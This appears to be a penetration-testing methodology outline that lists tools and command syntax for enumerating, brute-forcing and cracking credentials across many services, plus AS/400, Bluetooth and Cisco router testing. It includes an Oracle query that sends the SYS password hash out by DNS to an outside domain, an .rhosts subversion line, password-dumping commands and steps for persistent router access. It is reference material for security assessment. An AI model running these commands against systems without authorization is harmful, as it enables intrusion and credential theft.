14.9.8.1.5. Input Validation Cheat Sheet
14.9.8.1.6. SQL Injection Cheat Sheet
14.9.8.2. Books
14.9.8.2.1. Hacking Exposed Web 2.0
14.9.8.2.2. Hacking Exposed Web Applications
14.9.8.2.3. The Web Application Hacker's Handbook
14.9.9. Exploit Frameworks
14.9.9.1. Brute-force Tools
14.9.9.1.1. Acunetix
14.9.9.2. Metasploit
14.9.9.3. w3af
14.10. Portmapper port 111 open
14.10.1. rpcdump.py
14.10.1.1. rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)
14.10.2. rpcinfo
14.10.2.1. rpcinfo [options] IP_Address
14.11. NTP Port 123 open
14.11.1. NTP Enumeration
14.11.1.1. ntpdc -c monlist IP_ADDRESS
14.11.1.2. ntpdc -c sysinfo IP_ADDRESS
14.11.1.3. ntpq
14.11.1.3.1. host
14.11.1.3.2. hostname
14.11.1.3.3. ntpversion
14.11.1.3.4. readlist
14.11.1.3.5. version
14.11.2. Examine configuration files
14.11.2.1. ntp.conf
14.11.3. nmap nse script
14.11.3.1. ntp-info
14.12. NetBIOS Ports 135-139,445 open
14.12.1. NetBIOS enumeration
14.12.1.1. Enum
14.12.1.1.1. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
14.12.1.2. Null Session
14.12.1.2.1. net use \\192.168.1.1\ipc$ "" /u:""
14.12.1.3. Smbclient
14.12.1.3.1. smbclient -L //server/share password options
14.12.1.4. Superscan
14.12.1.4.1. Enumeration tab.
14.12.1.5. user2sid/sid2user
14.12.1.6. Winfo
14.12.2. NetBIOS brute force
14.12.2.1. Hydra
14.12.2.2. Brutus
14.12.2.3. Cain & Abel
14.12.2.4. getacct
14.12.2.5. NAT (NetBIOS Auditing Tool)
14.12.3. Examine Configuration Files
14.12.3.1. Smb.conf
14.12.3.2. lmhosts
14.13. SNMP port 161 open
14.13.1. Default Community Strings
14.13.1.1. public
14.13.1.2. private
14.13.1.3. cisco
14.13.1.3.1. cable-docsis
14.13.1.3.2. ILMI
14.13.2. MIB enumeration
14.13.2.1. Windows NT
14.13.2.1.1. .1.3.6.1.2.1.1.5 Hostnames
14.13.2.1.2. .1.3.6.1.4.1.77.1.4.2 Domain Name
14.13.2.1.3. .1.3.6.1.4.1.77.1.2.25 Usernames
14.13.2.1.4. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
14.13.2.1.5. .1.3.6.1.4.1.77.1.2.27 Share Information
14.13.2.2. Solarwinds MIB walk
14.13.2.3. Getif
14.13.2.4. snmpwalk
14.13.2.4.1. snmpwalk -v <Version> -c <Community string> <IP>
14.13.2.5. Snscan
14.13.2.6. Applications
14.13.2.6.1. ZyXel
14.13.2.7. nmap nse script
14.13.2.7.1. snmp-sysdescr
14.13.3. SNMP Bruteforce
14.13.3.1. onesixtyone
14.13.3.1.1. onesixtyone -c SNMP.wordlist <IP>
14.13.3.2. cat
14.13.3.2.1. ./cat -h <IP> -w SNMP.wordlist
14.13.3.3. Solarwinds SNMP Brute Force
14.13.3.4. ADMsnmp
14.13.3.5. nmap nse script
14.13.3.5.1. snmp-brute
14.13.4. Examine SNMP Configuration files
14.13.4.1. snmp.conf
14.13.4.2. snmpd.conf
14.13.4.3. snmp-config.xml
14.14. LDAP Port 389 Open
14.14.1. ldap enumeration
14.14.1.1. ldapminer
14.14.1.1.1. ldapminer -h ip_address -p port (not required if default) -d
14.14.1.2. luma
14.14.1.2.1. Gui based tool
14.14.1.3. ldp
14.14.1.3.1. Gui based tool
14.14.1.4. openldap
14.14.1.4.1. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
14.14.1.4.2. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
14.14.1.4.3. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
14.14.1.4.4. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
14.14.1.4.5. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]
14.14.2. ldap brute force
14.14.2.1. bf_ldap
14.14.2.1.1. bf_ldap -s server -d domain_name -u|-U username|users_list_file -L|-l passwords_list|length_of_passwords_to_generate
    optional: -p port (default 389), -v (verbose mode), -P LDAP user path (default ,CN=Users,)
14.14.2.2. K0ldS
14.14.2.3. LDAP_Brute.pl
14.14.3. Examine Configuration Files
14.14.3.1. General
14.14.3.1.1. containers.ldif
14.14.3.1.2. ldap.cfg
14.14.3.1.3. ldap.conf
14.14.3.1.4. ldap.xml
14.14.3.1.5. ldap-config.xml
14.14.3.1.6. ldap-realm.xml
14.14.3.1.7. slapd.conf
14.14.3.2. IBM SecureWay V3 server
14.14.3.2.1. V3.sas.oc
14.14.3.3. Microsoft Active Directory server
14.14.3.3.1. msadClassesAttrs.ldif
14.14.3.4. Netscape Directory Server 4
14.14.3.4.1. nsslapd.sas_at.conf
14.14.3.4.2. nsslapd.sas_oc.conf
14.14.3.5. OpenLDAP directory server
14.14.3.5.1. slapd.sas_at.conf
14.14.3.5.2. slapd.sas_oc.conf
14.14.3.6. Sun ONE Directory Server 5.1
14.14.3.6.1. 75sas.ldif
14.15. PPTP/L2TP/VPN port 500/1723 open
14.15.1. Enumeration
14.15.1.1. ike-scan
14.15.1.2. ike-probe
14.15.2. Brute-Force
14.15.2.1. ike-crack
14.15.3. Reference Material
14.15.3.1. PSK cracking paper
14.15.3.2. SecurityFocus Infocus
14.15.3.3. Scanning a VPN Implementation
14.16. Modbus port 502 open
14.16.1. modscan
14.17. rlogin port 513 open
14.17.1. Rlogin Enumeration
14.17.1.1. Find the files
14.17.1.1.1. find / -name .rhosts
14.17.1.1.2. locate .rhosts
14.17.1.2. Examine Files
14.17.1.2.1. cat .rhosts
14.17.1.3. Manual Login
14.17.1.3.1. rlogin hostname -l username
14.17.1.3.2. rlogin <IP>
14.17.1.4. Subvert the files
14.17.1.4.1. echo ++ > .rhosts
14.17.2. Rlogin Brute force
14.17.2.1. Hydra
14.18. rsh port 514 open
14.18.1. Rsh Enumeration
14.18.1.1. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
14.18.2. Rsh Brute Force
14.18.2.1. rsh-grind
14.18.2.2. Hydra
14.18.2.3. medusa
14.19. SQL Server Port 1433 1434 open
14.19.1. SQL Enumeration
14.19.1.1. piggy
14.19.1.2. SQLPing
14.19.1.2.1. sqlping ip_address/hostname
14.19.1.3. SQLPing2
14.19.1.4. SQLPing3
14.19.1.5. SQLpoke
14.19.1.6. SQL Recon
14.19.1.7. SQLver
14.19.2. SQL Brute Force
14.19.2.1. SQLPAT
14.19.2.1.1. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack
14.19.2.1.2. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack
14.19.2.2. SQL Dict
14.19.2.3. SQLAT
14.19.2.4. Hydra
14.19.2.5. SQLlhf
14.19.2.6. ForceSQL
14.20. Citrix port 1494 open
14.20.1. Citrix Enumeration
14.20.1.1. Default Domain
14.20.1.2. Published Applications
14.20.1.2.1. ./citrix-pa-scan {IP_address/file | - | random} [timeout]
14.20.1.2.2. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]
14.20.2. Citrix Brute Force
14.20.2.1. bforce.js
14.20.2.2. connect.js
14.20.2.3. Citrix Brute-forcer
14.20.2.4. Reference Material
14.20.2.4.1. Hacking Citrix - the legitimate backdoor
14.20.2.4.2. Hacking Citrix - the forceful way
14.21. Oracle Port 1521 Open
14.21.1. Oracle Enumeration
14.21.1.1. oracsec
14.21.1.2. Repscan
14.21.1.3. Sidguess
14.21.1.4. Scuba
14.21.1.5. DNS/HTTP Enumeration
14.21.1.5.1. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL;
14.21.1.6. WinSID
14.21.1.7. Oracle default password list
14.21.1.8. TNSVer
14.21.1.8.1. tnsver host [port]
14.21.1.9. TCP Scan
14.21.1.10. Oracle TNSLSNR
14.21.1.10.1. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
14.21.1.11. TNSCmd
14.21.1.11.1. perl tnscmd.pl -h ip_address
14.21.1.11.2. perl tnscmd.pl version -h ip_address
14.21.1.11.3. perl tnscmd.pl status -h ip_address
14.21.1.11.4. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
14.21.1.12. LSNrCheck
14.21.1.13. Oracle Security Check (needs credentials)
14.21.1.14. OAT
14.21.1.14.1. sh opwg.sh -s ip_address
14.21.1.14.2. opwg.bat -s ip_address
14.21.1.14.3. sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID
14.21.1.15. OScanner
14.21.1.15.1. sh oscanner.sh -s ip_address
14.21.1.15.2. oscanner.exe -s ip_address
14.21.1.15.3. sh reportviewer.sh oscanner_saved_file.xml
14.21.1.15.4. reportviewer.exe oscanner_saved_file.xml
14.21.1.16. NGS Squirrel for Oracle
14.21.1.17. Service Register
14.21.1.17.1. Service-register.exe ip_address
14.21.1.18. PLSQL Scanner 2008
14.21.2. Oracle Brute Force
14.21.2.1. OAK
14.21.2.1.1. ora-getsid hostname port sid_dictionary_list
14.21.2.1.2. ora-auth-alter-session host port sid username password sql
14.21.2.1.3. ora-brutesid host port start
14.21.2.1.4. ora-pwdbrute host port sid username password-file
14.21.2.1.5. ora-userenum host port sid userlistfile
14.21.2.1.6. ora-ver -e (-f -l -a) host port
14.21.2.2. breakable (Targets Application Server Port)
14.21.2.2.1. breakable.exe host url [port] [v]
    host - ip_address of the Oracle Portal Server
    url - PATH_INFO i.e. /pls/orasso
    port - TCP port the Oracle Portal Server is serving pages from
    v - verbose
14.21.2.3. SQLInjector (Targets Application Server Port)
14.21.2.3.1. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
14.21.2.3.2. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
14.21.2.4. Check Password
14.21.2.5. orabf
14.21.2.5.1. orabf [hash]:[username] [options]
14.21.2.6. thc-orakel
14.21.2.6.1. Cracker
14.21.2.6.2. Client
14.21.2.6.3. Crypto
14.21.2.7. DBVisualisor
14.21.2.7.1. Sql scripts from pentest.co.uk
14.21.2.7.2. Manual SQL input of previously reported vulnerabilities
14.21.3. Oracle Reference Material
14.21.3.1. Understanding SQL Injection
14.21.3.2. SQL Injection walkthrough
14.21.3.3. SQL Injection by example
14.21.3.4. Advanced SQL Injection in Oracle databases
14.21.3.5. Blind SQL Injection
14.21.3.6. SQL Cheatsheets
14.21.3.6.1. Untitled
14.22. NFS Port 2049 open
14.22.1. NFS Enumeration
14.22.1.1. showmount -e hostname/ip_address
14.22.1.2. mount -t nfs ip_address:/directory_found_exported /local_mount_point
14.22.2. NFS Brute Force
14.22.2.1. Interact with NFS share and try to add/delete
14.22.2.2. Exploit and Confuse Unix
14.22.3. Examine Configuration Files
14.22.3.1. /etc/exports
14.22.3.2. /etc/lib/nfs/xtab
14.22.4. nmap nse script
14.22.4.1. nfs-showmount
14.23. Compaq/HP Insight Manager Port 2301, 2381 open
14.23.1. HP Enumeration
14.23.1.1. Authentication Method
14.23.1.1.1. Host OS Authentication
14.23.1.1.2. Default Authentication
14.23.1.2. Wikto
14.23.1.3. Nstealth
14.23.2. HP Bruteforce
14.23.2.1. Hydra
14.23.2.2. Acunetix
14.23.3. Examine Configuration Files
14.23.3.1. path.properties
14.23.3.2. mx.log
14.23.3.3. CLIClientConfig.cfg
14.23.3.4. database.props
14.23.3.5. pg_hba.conf
14.23.3.6. jboss-service.xml
14.23.3.7. .namazurc
14.24. MySQL port 3306 open
14.24.1. Enumeration
14.24.1.1. nmap -A -n -p3306 <IP Address>
14.24.1.2. nmap -A -n -PN --script:ALL -p3306 <IP Address>
14.24.1.3. telnet IP_Address 3306
14.24.1.4. use test; select * from test;
14.24.1.5. To check for other DB's -- show databases
14.24.2. Administration
14.24.2.1. MySQL Network Scanner
14.24.2.2. MySQL GUI Tools
14.24.2.3. mysqlshow
14.24.2.4. mysqlbinlog
14.24.3. Manual Checks
14.24.3.1. Default usernames and passwords
14.24.3.1.1. username: root password:
14.24.3.1.2. testing
14.24.3.2. Configuration Files
14.24.3.2.1. Operating System
14.24.3.2.2. Command History
14.24.3.2.3. Log Files
14.24.3.2.4. To run many sql commands at once -- mysql -u username -p < manycommands.sql
14.24.3.2.5. MySQL data directory (Location specified in my.cnf)
14.24.3.2.6. SSL Check
14.24.3.3. Privilege Escalation
14.24.3.3.1. Current Level of access
14.24.3.3.2. Access passwords
14.24.3.3.3. Create a new user and grant him privileges
14.24.3.3.4. Break into a shell
14.24.4. SQL injection
14.24.4.1. mysql-miner.pl
14.24.4.1.1. mysql-miner.pl http://target/ expected_string database
14.24.4.2. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html
14.24.4.3. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
14.24.5. References.
14.24.5.1. Design Weaknesses
14.24.5.1.1. MySQL running as root
14.24.5.1.2. Exposed publicly on Internet
14.24.5.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql
14.24.5.3. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0
14.25. RDesktop port 3389 open
14.25.1. Rdesktop Enumeration
14.25.1.1. Remote Desktop Connection
14.25.2. Rdesktop Bruteforce
14.25.2.1. TSGrinder
14.25.2.1.1. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address
14.25.2.2. Tscrack
14.26. Sybase Port 5000+ open
14.26.1. Sybase Enumeration
14.26.1.1. sybase-version ip_address from NGS
14.26.2. Sybase Vulnerability Assessment
14.26.2.1. Use DBVisualiser
14.26.2.1.1. Sybase Security checksheet
14.26.2.1.2. Manual sql input of previously reported vulnerabilities
14.26.2.2. NGS Squirrel for Sybase
14.27. SIP Port 5060 open
14.27.1. SIP Enumeration
14.27.1.1. netcat
14.27.1.1.1. nc IP_Address Port
14.27.1.2. sipflanker
14.27.1.2.1. python sipflanker.py 192.168.1-254
14.27.1.3. Sipscan
14.27.1.4. smap
14.27.1.4.1. smap IP_Address/Subnet_Mask
14.27.1.4.2. smap -o IP_Address/Subnet_Mask
14.27.1.4.3. smap -l IP_Address
14.27.2. SIP Packet Crafting etc.
14.27.2.1. sipsak
14.27.2.1.1. Tracing paths: - sipsak -T -s sip:username@domain
14.27.2.1.2. Options request:- sipsak -vv -s sip:username@domain
14.27.2.1.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
14.27.2.2. siprogue
14.27.3. SIP Vulnerability Scanning/ Brute Force
14.27.3.1. tftp bruteforcer
14.27.3.1.1. Default dictionary file
14.27.3.1.2. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes
14.27.3.2. VoIPaudit
14.27.3.3. SiVuS
14.27.4. Examine Configuration Files
14.27.4.1. SIPDefault.cnf
14.27.4.2. asterisk.conf
14.27.4.3. sip.conf
14.27.4.4. phone.conf
14.27.4.5. sip_notify.conf
14.27.4.6. <Ethernet address>.cfg
14.27.4.7. 000000000000.cfg
14.27.4.8. phone1.cfg
14.27.4.9. sip.cfg etc. etc.
14.28. VNC port 5900^ open
14.28.1. VNC Enumeration
14.28.1.1. Scans
14.28.1.1.1. 5900^ for direct access. 5800 for HTTP access.
14.28.2. VNC Brute Force
14.28.2.1. Password Attacks
14.28.2.1.1. Remote
14.28.2.1.2. Local
14.28.3. Examine Configuration Files
14.28.3.1. .vnc
14.28.3.2. /etc/vnc/config
14.28.3.3. $HOME/.vnc/config
14.28.3.4. /etc/sysconfig/vncservers
14.28.3.5. /etc/vnc.conf
14.29. Tor Port 9001, 9030 open
14.29.1. Tor Node Checker
14.29.1.1. Ip Pages
14.29.1.2. Kewlio.net
14.29.2. nmap NSE script
14.30. Jet Direct 9100 open
14.30.1. hijetta
15. Password cracking
15.1. Rainbow crack
15.1.1. ophcrack
15.1.2. rainbow tables
15.1.2.1. rcrack c:\rainbowcrack\*.rt -f pwfile.txt
15.2. Ophcrack
15.3. Cain & Abel
15.4. John the Ripper
15.4.1. ./unshadow passwd shadow > file_to_crack
15.4.2. ./john -single file_to_crack
15.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack
15.4.4. ./john -show file_to_crack
15.4.5. ./john --incremental:All file_to_crack
15.5. fgdump
15.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt
15.6. pwdump6
15.7. medusa
15.8. LCP
15.9. L0phtcrack (Note: - This tool was acquired by Symantec from @Stake and it is their policy not to ship outside the USA and Canada)
15.9.1. Domain credentials
15.9.2. Sniffing
15.9.3. pwdump import
15.9.4. sam import
15.10. aiocracker
15.10.1. aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list
16. Vulnerability Assessment - Utilising vulnerability scanners, all discovered hosts can then be tested for vulnerabilities. The results would then be analysed to determine if there are any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information; once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and reported to the user. Other tools actually use manual pen testing methods and display the output received, i.e. showmount -e ip_address would display the NFS shares available to the scanner, which would then need to be verified by the tester.
16.1. Manual
16.1.1. Patch Levels
16.1.2. Confirmed Vulnerabilities
16.1.2.1. Severe
16.1.2.2. High
16.1.2.3. Medium
16.1.2.4. Low
16.2. Automated
16.2.1. Reports
16.2.2. Vulnerabilities
16.2.2.1. Severe
16.2.2.2. High
16.2.2.3. Medium
16.2.2.4. Low
16.3. Tools
16.3.1. GFI
16.3.2. Nessus (Linux)
16.3.2.1. Nessus (Windows)
16.3.3. NGS Typhon
16.3.4. NGS Squirrel for Oracle
16.3.5. NGS Squirrel for SQL
16.3.6. SARA
16.3.7. MatriXay
16.3.8. BiDiBlah
16.3.9. SSA
16.3.10. Oval Interpreter
16.3.11. Xscan
16.3.12. Security Manager +
16.3.13. Inguma
16.4. Resources
16.4.1. Security Focus
16.4.2. Microsoft Security Bulletin
16.4.3. Common Vulnerabilities and Exploits (CVE)
16.4.4. National Vulnerability Database (NVD)
16.4.5. The Open Source Vulnerability Database (OSVDB)
16.4.5.1. Standalone Database
16.4.5.1.1. Update URL
16.4.6. United States Computer Emergency Response Team (US-CERT)
16.4.7. Computer Emergency Response Team
16.4.8. Mozilla Security Information
16.4.9. SANS
16.4.10. Securiteam
16.4.11. PacketStorm Security
16.4.12. Security Tracker
16.4.13. Secunia
16.4.14. Vulnerabilities.org
16.4.15. ntbugtraq
16.4.16. Wireless Vulnerabilities and Exploits (WVE)
16.5. Blogs
16.5.1. Carnal0wnage
16.5.2. Fsecure Blog
16.5.3. g0ne blog
16.5.4. GNUCitizen
16.5.5. ha.ckers Blog
16.5.6. Jeremiah Grossman Blog
16.5.7. Metasploit
16.5.8. nCircle Blogs
16.5.9. pentestmonkey.net
16.5.10. Rational Security
16.5.11. Rise Security
16.5.12. Security Fix Blog
16.5.13. Software Vulnerability Exploitation Blog
16.5.14. Taosecurity Blog
17. AS/400 Auditing
17.1. Remote
17.1.1. Information Gathering
17.1.1.1. Nmap using common iSeries (AS/400) services.
17.1.1.1.1. Unsecured services (Port;name;description)
17.1.1.1.2. Secured services (Port;name;description)
17.1.1.2. NetCat (old school technique)
17.1.1.2.1. nc -v -z -w target ListOfServices.txt | grep "open"
17.1.1.3. Banner Grabbing
17.1.1.3.1. Telnet
17.1.1.3.2. FTP
17.1.1.3.3. HTTP Banner
17.1.1.3.4. POP3
17.1.1.3.5. SNMP
17.1.1.3.6. SMTP
17.1.2. User Enumeration
17.1.2.1. Default AS/400 user accounts
17.1.2.2. Error messages
17.1.2.2.1. Telnet Login errors
17.1.2.2.2. POP3 authentication Errors
17.1.2.3. Qsys symbolic link (if ftp is enabled)
17.1.2.3.1. ftp target | quote stat | quote site namefmt 1
17.1.2.3.2. cd /
17.1.2.3.3. quote site listfmt 1
17.1.2.3.4. mkdir temp
17.1.2.3.5. quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')
17.1.2.3.6. quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')
17.1.2.3.7. dir /temp/qsys/*.usrprf
17.1.2.4. LDAP
17.1.2.4.1. Need os400-sys value from ibm-slapdSuffix
17.1.2.4.2. Tool to browse LDAP
17.1.3. Exploitation
17.1.3.1. CVE References
17.1.3.1.1. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=AS400
17.1.3.1.2. CVE-2005-1244 - Severity : High - CVSS : 7.0
17.1.3.1.3. CVE-2005-1243 - Severity : Low - CVSS : 3.3
17.1.3.1.4. CVE-2005-1242 - Severity : Low - CVSS : 3.3
17.1.3.1.5. CVE-2005-1241 - Severity : High - CVSS : 7.0
17.1.3.1.6. CVE-2005-1240 - Severity : High - CVSS : 7.0
17.1.3.1.7. CVE-2005-1239 - Severity : Low - CVSS : 3.3
17.1.3.1.8. CVE-2005-1238 - Severity : High - CVSS : 9.0
17.1.3.1.9. CVE-2005-1182 - Severity : Low - CVSS : 3.3
17.1.3.1.10. CVE-2005-1133 - Severity : Low - CVSS : 3.3
17.1.3.1.11. CVE-2005-1025 - Severity : Low - CVSS : 3.3
17.1.3.1.12. CVE-2005-0868 - Severity : High - CVSS : 7.0
17.1.3.1.13. CVE-2005-0899 - Severity : Low - CVSS : 2.3
17.1.3.1.14. CVE-2002-1822 - Severity : Low - CVSS : 3.3
17.1.3.1.15. CVE-2002-1731 - Severity : Low - CVSS : 2.3
17.1.3.1.16. CVE-2000-1038 - Severity : Low - CVSS : 3.3
17.1.3.1.17. CVE-1999-1279 - Severity : Low - CVSS : 3.3
17.1.3.1.18. CVE-1999-1012 - Severity : Low - CVSS : 3.3
17.1.3.2. Access with Work Station Gateway
17.1.3.2.1. http://target:5061/WSG
17.1.3.2.2. Default AS/400 accounts.
17.1.3.3. Network attacks (next release)
17.1.3.3.1. DB2
17.1.3.3.2. QSHELL
17.1.3.3.3. Hijacking Terminals
17.1.3.3.4. Trojan attacks
17.1.3.3.5. Hacking from AS/400
17.2. Local
17.2.1. System Value Security
17.2.1.1. Untitled
17.2.1.1.1. Untitled
17.2.1.2. Untitled
17.2.1.2.1. Untitled
17.2.1.3. Untitled
17.2.1.3.1. Untitled
17.2.1.4. Untitled
17.2.1.4.1. Recommended value is 30
17.2.2. Password Policy
17.2.2.1. Untitled
17.2.2.1.1. Untitled
17.2.2.1.2. Untitled
17.2.2.2. Untitled
17.2.2.2.1. Untitled
17.2.2.3. Untitled
17.2.2.3.1. Untitled
17.2.2.4. Untitled
17.2.2.4.1. Untitled
17.2.2.5. Untitled
17.2.3. Audit level
17.2.3.1. Untitled
17.2.3.1.1. Recommended value is *SECURITY
17.2.4. Documentation
17.2.4.1. Users class
17.2.4.1.1. Untitled
17.2.4.2. System Audit Settings
17.2.4.2.1. Untitled
17.2.4.3. Special Authorities Definitions
17.2.4.3.1. Untitled
18. Bluetooth Specific Testing
18.1. Bluescanner
18.2. Bluesweep
18.3. btscanner
18.4. Redfang
18.5. Blueprint
18.6. Bluesnarfer
18.7. Bluebugger
18.7.1. bluebugger [OPTIONS] -a <addr> [MODE]
18.8. Blueserial
18.9. Bloover
18.10. Bluesniff
18.11. Exploit Frameworks
18.11.1. BlueMaho
18.11.1.1. Untitled
18.12. Resources
18.12.1. URL's
18.12.1.1. BlueStumbler.org
18.12.1.2. Bluejackq.com
18.12.1.3. Bluejacking.com
18.12.1.4. Bluejackers
18.12.1.5. bluetooth-pentest
18.12.1.6. ibluejackedyou.com
18.12.1.7. Trifinite
18.12.2. Vulnerability Information
18.12.2.1. Common Vulnerabilities and Exploits (CVE)
18.12.2.1.1. Vulnerabilities and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth
18.12.3. White Papers
18.12.3.1. Bluesnarfing
19. Cisco Specific Testing
19.1. Methodology
19.1.1. Scan & Fingerprint.
19.1.1.1. Untitled
19.1.1.2. Untitled
19.1.1.3. If SNMP is active, then community string guessing should be performed.
19.1.2. Credentials Guessing.
19.1.2.1. Untitled
19.1.2.2. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!
19.1.3. Connect
19.1.3.1. Untitled
19.1.3.2. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.
19.1.4. Check for bugs
19.1.4.1. Untitled
19.1.4.1.1. The most widely known/ used are: Nessus, Retina, GFI LanGuard and Core Impact.
19.1.4.1.2. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln
19.1.5. Further your attack
19.1.5.1. Untitled
19.1.5.1.1. running-config is the currently running configuration settings. This gets loaded from the startup-config on boot. This configuration file is editable and the changes are immediate. Any changes will be lost once the router is rebooted. It is this file that requires altering to maintain a non-permanent connection through to the internal network.
19.1.5.1.2. startup-config is the boot up configuration file. It is this file that needs altering to maintain a permanent connection through to the internal network.
19.1.5.2. Untitled
19.1.5.2.1. #> access-list 100 permit ip <IP> any
19.2. Scan & Fingerprint.
19.2.1. Port Scanning
19.2.1.1. nmap
19.2.1.1.1. Untitled
19.2.1.2. Other tools
19.2.1.2.1. Untitled
19.2.1.2.2. mass-scanner is a simple scanner for discovering Cisco devices within a given network range.
19.2.2. Fingerprinting
19.2.2.1. Untitled
19.2.2.1.1. BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175
19.2.2.2. Untitled
19.2.2.2.1. TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt
19.2.2.2.2. Untitled
19.3. Password Guessing.
19.3.1. Untitled
19.3.1.1. ./CAT -h <IP> -a password.wordlist
19.3.1.2. Untitled
19.3.2. Untitled
19.3.2.1. ./enabler <IP> [-u username] -p password /password.wordlist [port]
19.3.2.2. Untitled
19.3.3. Untitled
19.3.3.1. BT tmp # hydra -l "" -P password.wordlist -t 4 <IP> cisco
19.3.3.2. Untitled
19.4. SNMP Attacks.
19.4.1. Untitled
19.4.1.1. ./CAT -h <IP> -w SNMP.wordlist
19.4.1.2. Untitled
19.4.2. Untitled
19.4.2.1. onesixtyone -c SNMP.wordlist <IP>
19.4.2.2. BT onesixtyone-0.3.2 # onesixtyone -c dict.txt 10.1.1.175 Scanning 1 hosts, 64 communities 10.1.1.175 [enable] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug 10.1.1.175 [Cisco] Cisco Internetwork Operating System Software IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1) Technical Support: http://www.cisco.com/techsupport Copyright (c) 1986-2005 by cisco Systems, Inc. Compiled Fri 12-Aug
19.4.3. Untitled
19.4.3.1. snmpwalk -v <Version> -c <Community string> <IP>
19.4.3.2. Untitled
19.5. Connecting.
19.5.1. Telnet
19.5.1.1. Untitled
19.5.1.1.1. telnet <IP>
19.5.1.1.2. Sample Banners
19.5.2. SSH
19.5.3. Web Browser
19.5.3.1. Untitled
19.5.3.1.1. This uses a combination of username and password to authenticate. After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:
19.5.3.1.2. Authentication Required Enter username and password for "level_15_access" at http://10.1.1.1 User Name: Password:
19.5.3.1.3. Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.
19.5.4. TFTP
19.5.4.1. Untitled
19.5.4.1.1. Untitled
19.5.4.1.2. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server. Both of these tools require the config files to be saved with default names.
19.5.4.2. Untitled
19.5.4.2.1. ./cisco-torch.pl <options> <IP,hostname,network>
19.5.4.2.2. ./cisco-torch.pl <options> -F <hostlist>
19.5.4.2.3. Creating backdoors in Cisco IOS using TCL
19.6. Known Bugs.
